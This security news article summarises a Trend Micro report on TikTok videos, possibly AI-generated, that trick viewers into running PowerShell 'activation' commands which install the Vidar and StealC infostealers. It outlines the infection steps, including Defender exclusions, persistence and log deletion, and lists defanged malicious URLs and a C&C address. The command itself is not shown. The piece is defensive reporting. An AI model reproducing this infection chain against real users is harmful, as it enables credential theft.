Ddos 
The infection chain of the campaigns that lead to the Vidar and StealC malware | Image: Trend Micro
Trend Micro reveals a growing threat on TikTok, where AI-generated videos deceive users into running malicious PowerShell commands — exposing them to potent information-stealing malware.
In a recent exposé, Trend Micro uncovered a dangerous social engineering campaign that hijacks TikTok’s viral platform to distribute Vidar and StealC, two sophisticated information-stealing malware families. By leveraging AI-generated content and exploiting user trust, cybercriminals are transforming innocent video tutorials into vectors for malware.
“This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps,” the report explains.
The campaign begins with TikTok accounts like @gitallowed, @zane.houghton, and @sysglow.wow sharing faceless tutorial videos that instruct viewers to activate software like Windows, Spotify, or CapCut. These videos, some garnering over half a million views, show step-by-step “activation” instructions that culminate in a PowerShell command like:
“The videos instruct viewers to run a sequence of commands… The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos,” noted Trend Micro.
The command downloads and executes a remote script, initiating a malware dropper chain that is both stealthy and persistent.
Here’s a breakdown of how the attack unfolds:
- Users execute PowerShell commands directly after watching the TikTok video.
- A remote script from hxxps://allaivo[.]me/spotify is downloaded and run.
- Hidden directories are created in APPDATA and LOCALAPPDATA, and added to Windows Defender’s exclusion list.
- A secondary payload is downloaded — typically Vidar or StealC from hxxps://amssh[.]co/file.exe.
- A final persistence script is fetched from hxxps://amssh[.]co/script.ps1, enabling the malware to survive reboots.
- Logs and temp folders are deleted to obscure forensic evidence.
“The script employs retry logic to ensure that the payload is downloaded successfully, and then launches the malware executable as a hidden, elevated process,” Trend Micro warns.
Once active, the malware communicates with its C&C servers using novel evasion techniques:
- Vidar uses platforms like Steam and Telegram as Dead Drop Resolvers (DDR), hiding real server addresses in profile metadata.
- StealC connects directly to IP-based endpoints like 91[.]92[.]46[.]70.
“Vidar, in particular, abuses legitimate services like Steam and Telegram to serve as Dead Drop Resolvers,” the researchers state.
The abuse of TikTok’s algorithmic amplification, combined with AI-generated deception, marks a new era in malware delivery. As Trend Micro emphasizes: “The use of AI-generated content also elevates these kinds of attacks from isolated incidents to a highly scalable operation.”
Related Posts:
- Beware of Fake KMSPico Activators: A Gateway for Vidar Stealer Malware
- Vidar Stealer Hides in Legitimate BGInfo Tool
- StealC Infostealer Spreads in New Disguise, Targets User Data
- Stealc Malware: The Infostealer Targeting Credentials, Crypto Wallets, and More
- StealC V2: ThreatLabz Unveils the Evolution of a Stealthy Info-Stealer and Malware Loader
Donate